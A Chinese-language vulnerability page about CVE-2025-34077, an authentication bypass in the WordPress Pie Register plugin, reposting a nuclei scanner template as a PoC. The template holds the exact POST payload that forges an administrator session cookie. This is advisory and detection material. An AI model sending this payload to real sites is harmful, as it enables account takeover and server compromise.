WordPress Pie Register Authentication Bypass Vulnerability

漏洞信息

漏洞名称: WordPress Pie Register Authentication Bypass Vulnerability

漏洞编号:

  • CVE: CVE-2025-34077

漏洞类型: 权限绕过

漏洞等级: 严重

漏洞描述: WordPress Pie Register插件是一个用于WordPress的用户注册和管理插件,广泛应用于各种WordPress网站中,提供用户注册、登录、密码恢复等功能。该插件在版本3.7.1.4及之前存在一个认证绕过漏洞,允许未认证的攻击者通过提交特制的POST请求到登录端点,绕过认证机制,冒充任意用户,包括管理员。攻击者通过设置social_site=true并操纵user_id_social_site参数,可以为任何用户ID生成有效的WordPress会话cookie。一旦认证成功,攻击者可能利用插件上传功能安装包含任意PHP代码的恶意插件,导致在底层服务器上执行远程代码。此漏洞的根源在于插件未能正确验证用户提交的认证请求,使得攻击者能够绕过正常的认证流程。由于攻击者可以冒充管理员,此漏洞可能导致网站被完全控制,数据泄露,甚至服务器被入侵。攻击无需认证即可利用,且可以自动化执行,因此风险极高。

产品厂商: WordPress

产品名称: Pie Register

影响版本: version <= 3.7.1.4

搜索语法: /wp-content/plugins/pie-register/

来源: https://github.com/projectdiscovery/nuclei-templates/blob/130827913c7f8557c1d6db719ad5955235defcc4/http%2Fcves%2F2025%2FCVE-2025-34077.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

id: CVE-2025-34077

info:
  name: WordPress Pie Register <= 3.7.1.4 - Authentication Bypass
  author: kylew1004
  severity: critical
  description: |
    An authentication bypass vulnerability exists in the WordPress Pie Register plugin ≤ 3.7.1.4 that allows unauthenticated attackers to impersonate arbitrary users by submitting a crafted POST request to the login endpoint. By setting social_site=true and manipulating the user_id_social_site parameter, an attacker can generate a valid WordPress session cookie for any user ID, including administrators.Once authenticated, the attacker may exploit plugin upload functionality to install a malicious plugin containing arbitrary PHP code, resulting in remote code execution on the underlying server.
  reference:
    - https://github.com/MrjHaxcore/CVE-2025-34077
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34077
    - https://securityvulnerability.io/vulnerability/CVE-2025-34077
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/pie-register/"
  tags: cve,cve2025,wordpress,wp-plugin,pie-register,wp,auth-bypass

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null

    matchers:
      - type: dsl
        dsl:
          - "contains(set_cookie,'wordpress_logged_in_')"
          - "status_code==302"
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/index.php HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Dashboard","Plugins","Edit Profile")'
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #权限绕过
WordPress Pie Register Authentication Bypass Vulnerability
http://example.com/2025/07/27/github_2742288785/
作者
lianccc
发布于
2025年7月27日
许可协议